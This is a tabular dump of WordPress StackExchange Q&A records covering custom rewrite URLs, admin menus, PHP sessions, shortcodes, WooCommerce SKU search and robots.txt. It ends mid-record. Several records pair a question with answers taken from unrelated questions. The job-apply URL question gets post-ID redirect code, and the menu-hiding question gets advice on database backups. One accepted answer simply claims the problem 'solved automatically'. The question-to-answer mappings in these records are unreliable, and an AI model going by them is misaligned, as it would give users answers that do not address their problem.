qid
int64 4
8.14M
| question
stringlengths 20
48.3k
| answers
list | date
stringlengths 10
10
| metadata
sequence | input
stringlengths 12
45k
| output
stringlengths 2
31.8k
|
---|---|---|---|---|---|---|
373,972 | <p>I have a CPT called jobs and a page named Job Apply. I am trying to achieve something like below url:</p>
<pre><code>http://example.com/job-slug/apply
</code></pre>
<p>Where, <strong>job-slug</strong> can be any job. i.e Programmer, Developer etc..</p>
<p>On clicking job's apply button, it should open an apply page which consists a simple form, but url should be as mentioned above.</p>
<p>I am trying to achieve it by using add_rewrite_rule(), but after trying too much, it is still redirecting me on the below url:</p>
<pre><code>http://example.com/apply
</code></pre>
<p>Any help would be appreciated. Thanks in advance.</p>
| [
{
"answer_id": 373443,
"author": "Suresh Shinde",
"author_id": 167466,
"author_profile": "https://wordpress.stackexchange.com/users/167466",
"pm_score": -1,
"selected": false,
"text": "<p>You can do it by .htaccess file, for your case url format as;</p>\n<p>Redirect 301 /%post_id%/ <a href=\"https://elrons.co.il/%postname%/\" rel=\"nofollow noreferrer\">https://elrons.co.il/%postname%/</a></p>\n<p>Or</p>\n<p>By redirection plugin, for example <a href=\"https://wordpress.org/plugins/eps-301-redirects/\" rel=\"nofollow noreferrer\">301 Redirects – Easy Redirect Manager</a></p>\n"
},
{
"answer_id": 373444,
"author": "Elron",
"author_id": 98773,
"author_profile": "https://wordpress.stackexchange.com/users/98773",
"pm_score": 1,
"selected": true,
"text": "<p>I've written my own solution, sharing it and hoping it will help someone.</p>\n<p>Add this to your <code>functions.php</code>:</p>\n<pre><code><?php\n\nadd_action('parse_request', 'redirect_postid_to_postname');\nfunction redirect_postid_to_postname($wp)\n{\n // If /%post_id%/\n if (is_numeric($wp->request)) {\n\n $post_id = $wp->request;\n $slug = get_post_field( 'post_name', $post_id );\n\n // If the post slug === the post number, prevent redirection loops.\n if ($slug !== $post_id) {\n \n // Adding url parameters manually to $redirect_to\n $parameters = $_SERVER[QUERY_STRING];\n\n $redirect_from = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";\n $redirect_to = get_permalink($post_id) . (!empty($parameters) ? ("?" . $parameters) : "");\n \n // Prevent loops\n if($redirect_from !== $redirect_to) {\n wp_redirect($redirect_to, 301);\n exit;\n }\n\n }\n }\n}\n</code></pre>\n"
}
] | 2020/08/29 | [
"https://wordpress.stackexchange.com/questions/373972",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/182583/"
] | I have a CPT called jobs and a page named Job Apply. I am trying to achieve something like below url:
```
http://example.com/job-slug/apply
```
Where, **job-slug** can be any job. i.e Programmer, Developer etc..
On clicking job's apply button, it should open an apply page which consists a simple form, but url should be as mentioned above.
I am trying to achieve it by using add\_rewrite\_rule(), but after trying too much, it is still redirecting me on the below url:
```
http://example.com/apply
```
Any help would be appreciated. Thanks in advance. | I've written my own solution, sharing it and hoping it will help someone.
Add this to your `functions.php`:
```
<?php
add_action('parse_request', 'redirect_postid_to_postname');
function redirect_postid_to_postname($wp)
{
// If /%post_id%/
if (is_numeric($wp->request)) {
$post_id = $wp->request;
$slug = get_post_field( 'post_name', $post_id );
// If the post slug === the post number, prevent redirection loops.
if ($slug !== $post_id) {
// Adding url parameters manually to $redirect_to
$parameters = $_SERVER[QUERY_STRING];
$redirect_from = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
$redirect_to = get_permalink($post_id) . (!empty($parameters) ? ("?" . $parameters) : "");
// Prevent loops
if($redirect_from !== $redirect_to) {
wp_redirect($redirect_to, 301);
exit;
}
}
}
}
``` |
374,082 | <p>I installed a plugin that has a custom post type, that looks like the picture below:</p>
<p><a href="https://i.stack.imgur.com/GDWKG.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/GDWKG.png" alt="enter image description here" /></a></p>
<p>WhatI's like to do is hide the "Pictures" link in this menu. It's a custom post type. The link looks like: <code>edit.php?post_type=cbs_pictures</code></p>
<p>I tried:</p>
<pre><code>function plt_hide_custom_post_type_ui_menus() {
remove_submenu_page('menu-posts-cbs_booking', 'edit.php?post_type=cbs_pictures');
}
add_action('admin_menu', 'plt_hide_custom_post_type_ui_menus', 11);
</code></pre>
<p>I also tried:</p>
<pre><code>function your_custom__remove_menu_items() {
remove_menu_page( 'edit.php?post_type=cbs_pictures' );
}
add_action( 'admin_menu', 'your_custom_remove_menu_items' );
</code></pre>
<p>but neither of these snippets worked...the "Pictures" link still shows.</p>
<p>Anyone know how this could be hidden? I would like to still be able to use the url to access the page, I would just like the "Pictures" menu item to be hidden. Any ideas?</p>
<p>Thanks,<br />
Josh</p>
| [
{
"answer_id": 373986,
"author": "Jacob Peattie",
"author_id": 39152,
"author_profile": "https://wordpress.stackexchange.com/users/39152",
"pm_score": 2,
"selected": false,
"text": "<p>Very little. Any media you uploaded, and any plugins or themes you installed, will be the in<code>/wp-content/uploads</code> directory, but which plugins are active and their settings, your active theme and it’s settings, and <em>all</em> your content will be missing. That’s all in the database.</p>\n"
},
{
"answer_id": 374017,
"author": "Rick Hellewell",
"author_id": 29416,
"author_profile": "https://wordpress.stackexchange.com/users/29416",
"pm_score": 2,
"selected": true,
"text": "<p>All site content for your WordPress site is stored in the database. The files that query and display the data, store settings, etc, are in the theme and plugin folders. There is the wp-config.php file that stores access credentials for your database. And media files are stored in the wp-content folder, but media files locations are stored in the database.</p>\n<p>If you have a backup of your database, you can essentially recreate all content by installing the latest versions of themes and plugin, then activate as required. You also need a backup of your media file folders and files. With those items, you can essentially recreate your site.</p>\n<p>That means that it is important to not only backup your database, but also your media files. There are plugins that will allow a re-sync of media files into the database, but a backup of everything (database, themes, plugins, media folders and contents) is an important thing to do - that will help you recover from problems.</p>\n<p>Your hosting company may do backups of your entire public_html folder, and your databases, so you could contact them to restore all or part of your site. But a backup plugin that takes care of all databases, and the folders/files in themes/plugins/media is a good thing to have - especially if those backups are stored 'off-site' (for instance, emailed to you).</p>\n"
}
] | 2020/09/01 | [
"https://wordpress.stackexchange.com/questions/374082",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/9820/"
] | I installed a plugin that has a custom post type, that looks like the picture below:
[](https://i.stack.imgur.com/GDWKG.png)
WhatI's like to do is hide the "Pictures" link in this menu. It's a custom post type. The link looks like: `edit.php?post_type=cbs_pictures`
I tried:
```
function plt_hide_custom_post_type_ui_menus() {
remove_submenu_page('menu-posts-cbs_booking', 'edit.php?post_type=cbs_pictures');
}
add_action('admin_menu', 'plt_hide_custom_post_type_ui_menus', 11);
```
I also tried:
```
function your_custom__remove_menu_items() {
remove_menu_page( 'edit.php?post_type=cbs_pictures' );
}
add_action( 'admin_menu', 'your_custom_remove_menu_items' );
```
but neither of these snippets worked...the "Pictures" link still shows.
Anyone know how this could be hidden? I would like to still be able to use the url to access the page, I would just like the "Pictures" menu item to be hidden. Any ideas?
Thanks,
Josh | All site content for your WordPress site is stored in the database. The files that query and display the data, store settings, etc, are in the theme and plugin folders. There is the wp-config.php file that stores access credentials for your database. And media files are stored in the wp-content folder, but media files locations are stored in the database.
If you have a backup of your database, you can essentially recreate all content by installing the latest versions of themes and plugin, then activate as required. You also need a backup of your media file folders and files. With those items, you can essentially recreate your site.
That means that it is important to not only backup your database, but also your media files. There are plugins that will allow a re-sync of media files into the database, but a backup of everything (database, themes, plugins, media folders and contents) is an important thing to do - that will help you recover from problems.
Your hosting company may do backups of your entire public\_html folder, and your databases, so you could contact them to restore all or part of your site. But a backup plugin that takes care of all databases, and the folders/files in themes/plugins/media is a good thing to have - especially if those backups are stored 'off-site' (for instance, emailed to you). |
374,111 | <p>I am facing a problem with the loop inside the page template. Here is the code.</p>
<pre><code><?php
/* Template Name: Blog-Template */
get_header();
$args = [
'post_type' => 'post',
'posts_per_page' => 1,
];
$queryP = new WP_Query( $args );
if ($queryP->have_posts()) {
while ( $queryP->have_posts() ) : $queryP->the_post();
?>
<article>
<?php
the_title( '<h1>', '</h1>' );
the_excerpt();
?>
</article>
<?php
endwhile;
}
get_footer();
</code></pre>
<p>If I set this page as a blog page in settings then no problem happens. But when I create a custom loop for this template it doesn't work. It shows nothing just header and footer.</p>
| [
{
"answer_id": 374384,
"author": "Hector",
"author_id": 48376,
"author_profile": "https://wordpress.stackexchange.com/users/48376",
"pm_score": 0,
"selected": false,
"text": "<p>From <a href=\"https://wordpress.org/support/article/creating-a-static-front-page/\" rel=\"nofollow noreferrer\">https://wordpress.org/support/article/creating-a-static-front-page/</a>,</p>\n<blockquote>\n<p>Posts Page: (if not already created) create an empty page. Give it a Title that will be used on top of your posts list. This step is mandatory as you are modifying the WordPress default setting. Any other content other than Title will no be displayed at all on this specific page.</p>\n</blockquote>\n<p>So, When you set it as <strong>Posts page</strong>, Your loop is ignored.</p>\n<p>You can set it as static front page (<strong>Homepage</strong>) or a normal page with custom page template.</p>\n"
},
{
"answer_id": 374412,
"author": "Raashid Din",
"author_id": 140102,
"author_profile": "https://wordpress.stackexchange.com/users/140102",
"pm_score": -1,
"selected": true,
"text": "<p>It solved automatically. I think the WordPress version 5.5.1 is full of bugs. Thanks, everyone for your support.</p>\n"
}
] | 2020/09/01 | [
"https://wordpress.stackexchange.com/questions/374111",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/140102/"
] | I am facing a problem with the loop inside the page template. Here is the code.
```
<?php
/* Template Name: Blog-Template */
get_header();
$args = [
'post_type' => 'post',
'posts_per_page' => 1,
];
$queryP = new WP_Query( $args );
if ($queryP->have_posts()) {
while ( $queryP->have_posts() ) : $queryP->the_post();
?>
<article>
<?php
the_title( '<h1>', '</h1>' );
the_excerpt();
?>
</article>
<?php
endwhile;
}
get_footer();
```
If I set this page as a blog page in settings then no problem happens. But when I create a custom loop for this template it doesn't work. It shows nothing just header and footer. | It solved automatically. I think the WordPress version 5.5.1 is full of bugs. Thanks, everyone for your support. |
374,121 | <p>I am trying to take my existing object array then json_encode it and add it to a $_SESSION[''] so I can request it on other pages on my website. Is there a way to save my session string (or array) and display it on another page?</p>
<p>Below is the code of the array I am trying to add into a session. ( I don't know if I need to encode it, but I thought it would increase performance perhaps?)</p>
<pre><code> $postArray = array(
"CompanyID" => "5",
"FirstName" => $_POST['first_name'],
"LastName" => $_POST['last_name'],
"Email" => $_POST['email'],
"Company" => $_POST['company'],
"Phone" => $_POST['phone'],
"Fax" => $_POST['fax'],
"AdressLine1" => $_POST['address'],
"AdressLine2" => "",
"City" => $_POST['city'],
"DistrictID" => $_POST['state'],
"CountryID" => $_POST['country'],
"PostCode" => $_POST['postcode'],
"SpecialInstructions" => $_POST['special'],
"Items" =>
$item_array
,
"Source" => "Web submission"
);
$json = json_encode($postArray);
</code></pre>
<p>Then right after that code I try to initialize an action to wp to start and add to session</p>
<pre><code>add_action('wp', 'start_my_session');
function start_my_session() {
session_start();
$_SESSION['order_details'] = $GLOBALS['json'];
}
</code></pre>
<p>After that I try to call it on a new page with this code</p>
<pre><code><?php
add_action('wp_footer', 'show_session_var');
function show_session_var() {
if(isset($_SESSION['order_details'])) echo $_SESSION['order_details'];
}
?>
</code></pre>
<p>When I try to retrieve the data I get this error: session_start(): <em>Cannot start session when headers already sent</em> but I need to create a session because wordpress doesn't automatically make one?</p>
<p>Any thoughts? I am new to php development in Wordpress.</p>
| [
{
"answer_id": 374126,
"author": "drcrow",
"author_id": 178234,
"author_profile": "https://wordpress.stackexchange.com/users/178234",
"pm_score": 3,
"selected": true,
"text": "<p>Remove your session_start() and at the beginning of your functions.php put this:</p>\n<pre><code>if (!session_id()) {\n session_start();\n}\n</code></pre>\n<p>For use from a plugin use this:</p>\n<pre><code>function register_session(){\n if( !session_id() )\n session_start();\n}\nadd_action('init','register_session');\n</code></pre>\n"
},
{
"answer_id": 374148,
"author": "DevelJoe",
"author_id": 188571,
"author_profile": "https://wordpress.stackexchange.com/users/188571",
"pm_score": 0,
"selected": false,
"text": "<p>There's absolutely no need to do all of this of the answer above, simply use <code>session_start()</code> at the very top of your script, that will either retrieve the existing session, or start a new one if no one exists, all by itself (check <a href=\"https://www.php.net/manual/de/function.session-start.php\" rel=\"nofollow noreferrer\">here</a>). You simply need to call it at the very top of the script wherever you use $_SESSION content. So, use <code>session_start()</code> at the top of the script where you insert whatever into your $_SESSION superglobal, and then also call <code>session_start()</code> at the very top of the script where you wanna use it. works always, and gets particularly easy when you use page templates and custom themes. Also, adding session initiations into your functions.php file will open sessions on ANY of your pages, not just the ones where you want that, so you may do more than you would actually need.\nYou can also simply call <code>session_start()</code> in the corresponding plugin pages / scripts, etc.</p>\n"
}
] | 2020/09/01 | [
"https://wordpress.stackexchange.com/questions/374121",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/193744/"
] | I am trying to take my existing object array then json\_encode it and add it to a $\_SESSION[''] so I can request it on other pages on my website. Is there a way to save my session string (or array) and display it on another page?
Below is the code of the array I am trying to add into a session. ( I don't know if I need to encode it, but I thought it would increase performance perhaps?)
```
$postArray = array(
"CompanyID" => "5",
"FirstName" => $_POST['first_name'],
"LastName" => $_POST['last_name'],
"Email" => $_POST['email'],
"Company" => $_POST['company'],
"Phone" => $_POST['phone'],
"Fax" => $_POST['fax'],
"AdressLine1" => $_POST['address'],
"AdressLine2" => "",
"City" => $_POST['city'],
"DistrictID" => $_POST['state'],
"CountryID" => $_POST['country'],
"PostCode" => $_POST['postcode'],
"SpecialInstructions" => $_POST['special'],
"Items" =>
$item_array
,
"Source" => "Web submission"
);
$json = json_encode($postArray);
```
Then right after that code I try to initialize an action to wp to start and add to session
```
add_action('wp', 'start_my_session');
function start_my_session() {
session_start();
$_SESSION['order_details'] = $GLOBALS['json'];
}
```
After that I try to call it on a new page with this code
```
<?php
add_action('wp_footer', 'show_session_var');
function show_session_var() {
if(isset($_SESSION['order_details'])) echo $_SESSION['order_details'];
}
?>
```
When I try to retrieve the data I get this error: session\_start(): *Cannot start session when headers already sent* but I need to create a session because wordpress doesn't automatically make one?
Any thoughts? I am new to php development in Wordpress. | Remove your session\_start() and at the beginning of your functions.php put this:
```
if (!session_id()) {
session_start();
}
```
For use from a plugin use this:
```
function register_session(){
if( !session_id() )
session_start();
}
add_action('init','register_session');
``` |
374,165 | <p>I am creating a custom word press theme and i am little stuck in one situation, what i want is to echo the specific values of an array in the form of bordered tables. For example i want to display
| location | qualification | date |</p>
<p>here below is my code</p>
<pre><code> <td class="row-2 row-email"><?php $release_edu_qual = get_post_meta( get_the_ID(), '_candidate_education', true );
print_r($release_edu_qual);
?></td>
</code></pre>
<p>and this is the output of the above code:</p>
<blockquote>
<p>Array ( [0] => Array ( [location] => Stanford University
[qualification] => School of Arts & Sciences [date] => 2012-2015
[notes]
=> Maximus faucibus non non nibh. Cras luctus velit et ante vehicula, sit amet commodo magna eleifend. Fusce congue ante id urna porttitor
luctus. ) [1] => Array ( [location] => University of Pennsylvania
[qualification] => School of Design [date] => 2010-2012 [notes] =>
Phasellus vestibulum metus orci, ut facilisis dolor interdum eget.
Pellentesque magna sem, hendrerit nec elit sit amet, ornare efficitur
est. ) [2] => Array ( [location] => Massachusetts Institute of
Technology [qualification] => [date] => 2006-2010 [notes]
=> Suspendisse lorem lorem, aliquet at lectus quis, porttitor porta sapien. Etiam ut turpis tempor, vulputate risus at, elementum dui.
Etiam faucibus. ) )</p>
</blockquote>
| [
{
"answer_id": 374209,
"author": "davidb3rn",
"author_id": 193744,
"author_profile": "https://wordpress.stackexchange.com/users/193744",
"pm_score": 0,
"selected": false,
"text": "<p>To get a specific item in the object when already inside a specific array.</p>\n<pre><code>$location = $release_edu_qual->location;\n</code></pre>\n<p>To get all of a certain value use a foreach loop like this.</p>\n<pre><code>foreach ($release_edu_qual as $i) {\n $this_location = $i->location;\n print $this_location;\n}\n</code></pre>\n"
},
{
"answer_id": 374215,
"author": "dev_masta",
"author_id": 89164,
"author_profile": "https://wordpress.stackexchange.com/users/89164",
"pm_score": 2,
"selected": false,
"text": "<p>The previous answer is wrong, to access the array elements, you need to get it by the key:</p>\n<pre><code>$location = $release_edu_qual[0]["location"];\n</code></pre>\n<p>In the above code, we're getting the location of the array that's first (zero based) in the initial array.</p>\n<p>So to list all the array data you want from that initial array you could use something like:</p>\n<pre><code><table>\n <thead>\n <tr>\n <th>Location</th>\n <th>Qualification</th>\n <th>Date</th>\n </tr>\n </thead>\n <tbody>\n <?php\n \n foreach( $release_edu_qual as $item ){\n echo '<tr>';\n echo '<td>' . $item["location"] . '</td>';\n echo '<td>' . $item["qualification"] . '</td>';\n echo '<td>' . $item["date"] . '</td>';\n echo '</tr>';\n }\n \n ?>\n </tbody>\n</table>\n</code></pre>\n"
}
] | 2020/09/02 | [
"https://wordpress.stackexchange.com/questions/374165",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194041/"
] | I am creating a custom word press theme and i am little stuck in one situation, what i want is to echo the specific values of an array in the form of bordered tables. For example i want to display
| location | qualification | date |
here below is my code
```
<td class="row-2 row-email"><?php $release_edu_qual = get_post_meta( get_the_ID(), '_candidate_education', true );
print_r($release_edu_qual);
?></td>
```
and this is the output of the above code:
>
> Array ( [0] => Array ( [location] => Stanford University
> [qualification] => School of Arts & Sciences [date] => 2012-2015
> [notes]
> => Maximus faucibus non non nibh. Cras luctus velit et ante vehicula, sit amet commodo magna eleifend. Fusce congue ante id urna porttitor
> luctus. ) [1] => Array ( [location] => University of Pennsylvania
> [qualification] => School of Design [date] => 2010-2012 [notes] =>
> Phasellus vestibulum metus orci, ut facilisis dolor interdum eget.
> Pellentesque magna sem, hendrerit nec elit sit amet, ornare efficitur
> est. ) [2] => Array ( [location] => Massachusetts Institute of
> Technology [qualification] => [date] => 2006-2010 [notes]
> => Suspendisse lorem lorem, aliquet at lectus quis, porttitor porta sapien. Etiam ut turpis tempor, vulputate risus at, elementum dui.
> Etiam faucibus. ) )
>
>
> | The previous answer is wrong, to access the array elements, you need to get it by the key:
```
$location = $release_edu_qual[0]["location"];
```
In the above code, we're getting the location of the array that's first (zero based) in the initial array.
So to list all the array data you want from that initial array you could use something like:
```
<table>
<thead>
<tr>
<th>Location</th>
<th>Qualification</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<?php
foreach( $release_edu_qual as $item ){
echo '<tr>';
echo '<td>' . $item["location"] . '</td>';
echo '<td>' . $item["qualification"] . '</td>';
echo '<td>' . $item["date"] . '</td>';
echo '</tr>';
}
?>
</tbody>
</table>
``` |
374,173 | <p>I want to create a shortcode where content is displayed if user meta is equal to a value</p>
<p>It Works but it's code isn't perfect</p>
<p>how would you have done? How Can I improve it?</p>
<p>Example content display if firstname user is Jeff</p>
<pre><code>[check-if-equal usermeta="firstname" uservalue="Jeff"] Yes [/check-if-equal]
</code></pre>
<p>This is the code handling the above shortcode</p>
<pre><code><?php
function func_check_if_equal( $atts, $content = null ) {
if ( is_user_logged_in() ) { /* check if logged in */
$user_meta = $atts['usermeta'];
$user_value = $atts['uservalue'];
/* get value from shortcode parameter */
$user_id = get_current_user_id(); /* get user id */
$user_data = get_userdata( $user_id ); /* get user meta */
if ( $user_data->$user_meta == $user_value ) { /* if user meta is equal meta value */
return $content; /* show content from shortcode */
} else {
return ''; /* meta field don't equal */ }
} else {
return ''; /* user is not logged in */
}
}
}
add_shortcode( 'check-if-equal', 'func_check_if_equal' );
</code></pre>
<p>Thanks</p>
| [
{
"answer_id": 374209,
"author": "davidb3rn",
"author_id": 193744,
"author_profile": "https://wordpress.stackexchange.com/users/193744",
"pm_score": 0,
"selected": false,
"text": "<p>To get a specific item in the object when already inside a specific array.</p>\n<pre><code>$location = $release_edu_qual->location;\n</code></pre>\n<p>To get all of a certain value use a foreach loop like this.</p>\n<pre><code>foreach ($release_edu_qual as $i) {\n $this_location = $i->location;\n print $this_location;\n}\n</code></pre>\n"
},
{
"answer_id": 374215,
"author": "dev_masta",
"author_id": 89164,
"author_profile": "https://wordpress.stackexchange.com/users/89164",
"pm_score": 2,
"selected": false,
"text": "<p>The previous answer is wrong, to access the array elements, you need to get it by the key:</p>\n<pre><code>$location = $release_edu_qual[0]["location"];\n</code></pre>\n<p>In the above code, we're getting the location of the array that's first (zero based) in the initial array.</p>\n<p>So to list all the array data you want from that initial array you could use something like:</p>\n<pre><code><table>\n <thead>\n <tr>\n <th>Location</th>\n <th>Qualification</th>\n <th>Date</th>\n </tr>\n </thead>\n <tbody>\n <?php\n \n foreach( $release_edu_qual as $item ){\n echo '<tr>';\n echo '<td>' . $item["location"] . '</td>';\n echo '<td>' . $item["qualification"] . '</td>';\n echo '<td>' . $item["date"] . '</td>';\n echo '</tr>';\n }\n \n ?>\n </tbody>\n</table>\n</code></pre>\n"
}
] | 2020/09/02 | [
"https://wordpress.stackexchange.com/questions/374173",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/192355/"
] | I want to create a shortcode where content is displayed if user meta is equal to a value
It Works but it's code isn't perfect
how would you have done? How Can I improve it?
Example content display if firstname user is Jeff
```
[check-if-equal usermeta="firstname" uservalue="Jeff"] Yes [/check-if-equal]
```
This is the code handling the above shortcode
```
<?php
function func_check_if_equal( $atts, $content = null ) {
if ( is_user_logged_in() ) { /* check if logged in */
$user_meta = $atts['usermeta'];
$user_value = $atts['uservalue'];
/* get value from shortcode parameter */
$user_id = get_current_user_id(); /* get user id */
$user_data = get_userdata( $user_id ); /* get user meta */
if ( $user_data->$user_meta == $user_value ) { /* if user meta is equal meta value */
return $content; /* show content from shortcode */
} else {
return ''; /* meta field don't equal */ }
} else {
return ''; /* user is not logged in */
}
}
}
add_shortcode( 'check-if-equal', 'func_check_if_equal' );
```
Thanks | The previous answer is wrong, to access the array elements, you need to get it by the key:
```
$location = $release_edu_qual[0]["location"];
```
In the above code, we're getting the location of the array that's first (zero based) in the initial array.
So to list all the array data you want from that initial array you could use something like:
```
<table>
<thead>
<tr>
<th>Location</th>
<th>Qualification</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<?php
foreach( $release_edu_qual as $item ){
echo '<tr>';
echo '<td>' . $item["location"] . '</td>';
echo '<td>' . $item["qualification"] . '</td>';
echo '<td>' . $item["date"] . '</td>';
echo '</tr>';
}
?>
</tbody>
</table>
``` |
374,181 | <p>I have issue adding the <code>meta_value</code> in search query for the WooCommerce SKU. By default, the search by SKU only work on the admin.</p>
<p>I would like to make the frontend search accepting SKU in search.</p>
<p>Note : SKU are not in the product title. So I need to create a custom query.</p>
<pre><code> function SearchFilter($query) {
if ($query->is_search) {
$meta_query_args = array(
'relation' => 'OR',
array(
'key' => '_sku',
'value' => $query->query_vars['s'],
'compare' => '=',
)
);
$query->set('post_type', array('post','page', 'product'));
$query->set('post_status', array('publish'));
$query->set('meta_query', $meta_query_args);
}
return $query;
}
add_filter('pre_get_posts','SearchFilter');
</code></pre>
<p><strong>The problem :</strong> When I place this code and I print the current SQL request, it gives me something like this.</p>
<pre><code> SELECT SQL_CALC_FOUND_ROWS bhd_posts.ID FROM bhd_posts INNER JOIN bhd_postmeta ON ( bhd_posts.ID = bhd_postmeta.post_id ) WHERE 1=1 AND (((bhd_posts.post_title LIKE '%96242-20VH%') OR (bhd_posts.post_excerpt LIKE '%96242-20VH%') OR (bhd_posts.post_content LIKE '%96242-20VH%'))) AND (bhd_posts.post_password = '') AND (
( bhd_postmeta.meta_key = '_sku' AND bhd_postmeta.meta_value = '96242-20VH' )
) AND bhd_posts.post_type IN ('post', 'page', 'product') AND ((bhd_posts.post_status = 'publish')) GROUP BY bhd_posts.ID ORDER BY bhd_posts.post_title LIKE '%96242-20VH%' DESC, bhd_posts.post_date DESC LIMIT 0, 10
</code></pre>
<p>As you can see, it tries to fetch for the "classic part" in the table <code>x_posts</code> for <code>post_title</code> OR <code>post_excerpt</code> OR <code>post_content</code> <strong>AND</strong> it must have a <code>meta_value</code> of my SKU.</p>
<p>As told above, my product titles do not have the sku in them.</p>
<p><strong>Goal :</strong> Having to search in titles, excerpt, content or in meta_value OR search exclusivly with the meta_value.</p>
| [
{
"answer_id": 378507,
"author": "AHSAN KHAN",
"author_id": 134461,
"author_profile": "https://wordpress.stackexchange.com/users/134461",
"pm_score": 3,
"selected": false,
"text": "<p>If you are using wordpress search you can add this code to make it work</p>\n<pre><code>function search_by_sku( $search, &$query_vars ) {\n global $wpdb;\n if(isset($query_vars->query['s']) && !empty($query_vars->query['s'])){\n $args = array(\n 'posts_per_page' => -1,\n 'post_type' => 'product',\n 'meta_query' => array(\n array(\n 'key' => '_sku',\n 'value' => $query_vars->query['s'],\n 'compare' => 'LIKE'\n )\n )\n );\n $posts = get_posts($args);\n if(empty($posts)) return $search;\n $get_post_ids = array();\n foreach($posts as $post){\n $get_post_ids[] = $post->ID;\n }\n if(sizeof( $get_post_ids ) > 0 ) {\n $search = str_replace( 'AND (((', "AND ((({$wpdb->posts}.ID IN (" . implode( ',', $get_post_ids ) . ")) OR (", $search);\n }\n }\n return $search;\n \n}\n add_filter( 'posts_search', 'search_by_sku', 999, 2 );\n</code></pre>\n"
},
{
"answer_id": 412121,
"author": "Conor Treacy",
"author_id": 222130,
"author_profile": "https://wordpress.stackexchange.com/users/222130",
"pm_score": 0,
"selected": false,
"text": "<p>Not enough rep, so I couldn't comment, but here's the edit;</p>\n<p>The code by @ahsankhan seems to work, but as reported, it was giving a "parameter 2" error.</p>\n<p>If you remove the "<strong>&</strong>" from the first line where "<strong>&$query_vars</strong>" and replace with just "$query_vars" this seems to work without throwing any errors.</p>\n<pre><code>function search_by_sku( $search, $query_vars ) {\nglobal $wpdb;\nif(isset($query_vars->query['s']) && !empty($query_vars->query['s'])){\n $args = array(\n 'posts_per_page' => -1,\n 'post_type' => 'product',\n 'meta_query' => array(\n array(\n 'key' => '_sku',\n 'value' => $query_vars->query['s'],\n 'compare' => 'LIKE'\n )\n )\n );\n $posts = get_posts($args);\n if(empty($posts)) return $search;\n $get_post_ids = array();\n foreach($posts as $post){\n $get_post_ids[] = $post->ID;\n }\n if(sizeof( $get_post_ids ) > 0 ) {\n $search = str_replace( 'AND (((', "AND ((({$wpdb->posts}.ID IN (" . implode( ',', $get_post_ids ) . ")) OR (", $search);\n }\n}\nreturn $search;\n}\n add_filter( 'posts_search', 'search_by_sku', 999, 2 );\n</code></pre>\n"
}
] | 2020/09/02 | [
"https://wordpress.stackexchange.com/questions/374181",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/32365/"
] | I have issue adding the `meta_value` in search query for the WooCommerce SKU. By default, the search by SKU only work on the admin.
I would like to make the frontend search accepting SKU in search.
Note : SKU are not in the product title. So I need to create a custom query.
```
function SearchFilter($query) {
if ($query->is_search) {
$meta_query_args = array(
'relation' => 'OR',
array(
'key' => '_sku',
'value' => $query->query_vars['s'],
'compare' => '=',
)
);
$query->set('post_type', array('post','page', 'product'));
$query->set('post_status', array('publish'));
$query->set('meta_query', $meta_query_args);
}
return $query;
}
add_filter('pre_get_posts','SearchFilter');
```
**The problem :** When I place this code and I print the current SQL request, it gives me something like this.
```
SELECT SQL_CALC_FOUND_ROWS bhd_posts.ID FROM bhd_posts INNER JOIN bhd_postmeta ON ( bhd_posts.ID = bhd_postmeta.post_id ) WHERE 1=1 AND (((bhd_posts.post_title LIKE '%96242-20VH%') OR (bhd_posts.post_excerpt LIKE '%96242-20VH%') OR (bhd_posts.post_content LIKE '%96242-20VH%'))) AND (bhd_posts.post_password = '') AND (
( bhd_postmeta.meta_key = '_sku' AND bhd_postmeta.meta_value = '96242-20VH' )
) AND bhd_posts.post_type IN ('post', 'page', 'product') AND ((bhd_posts.post_status = 'publish')) GROUP BY bhd_posts.ID ORDER BY bhd_posts.post_title LIKE '%96242-20VH%' DESC, bhd_posts.post_date DESC LIMIT 0, 10
```
As you can see, it tries to fetch for the "classic part" in the table `x_posts` for `post_title` OR `post_excerpt` OR `post_content` **AND** it must have a `meta_value` of my SKU.
As told above, my product titles do not have the sku in them.
**Goal :** Having to search in titles, excerpt, content or in meta\_value OR search exclusivly with the meta\_value. | If you are using wordpress search you can add this code to make it work
```
function search_by_sku( $search, &$query_vars ) {
global $wpdb;
if(isset($query_vars->query['s']) && !empty($query_vars->query['s'])){
$args = array(
'posts_per_page' => -1,
'post_type' => 'product',
'meta_query' => array(
array(
'key' => '_sku',
'value' => $query_vars->query['s'],
'compare' => 'LIKE'
)
)
);
$posts = get_posts($args);
if(empty($posts)) return $search;
$get_post_ids = array();
foreach($posts as $post){
$get_post_ids[] = $post->ID;
}
if(sizeof( $get_post_ids ) > 0 ) {
$search = str_replace( 'AND (((', "AND ((({$wpdb->posts}.ID IN (" . implode( ',', $get_post_ids ) . ")) OR (", $search);
}
}
return $search;
}
add_filter( 'posts_search', 'search_by_sku', 999, 2 );
``` |
374,197 | <p>I received an error from google saying that I have mobile usability errors on my site.</p>
<p>the "page" that they are referring to is <a href="http://www.example.com/wp-content/plugins/ag-admin" rel="nofollow noreferrer">www.example.com/wp-content/plugins/ag-admin</a>.</p>
<p>I'm not asking for help with that plugin, but trying to figure out how to make google not index that directory at all.</p>
<p>Is disallawing this in my robots.txt enough or should I even have to do that?</p>
| [
{
"answer_id": 374200,
"author": "Cyclonecode",
"author_id": 14870,
"author_profile": "https://wordpress.stackexchange.com/users/14870",
"pm_score": 1,
"selected": false,
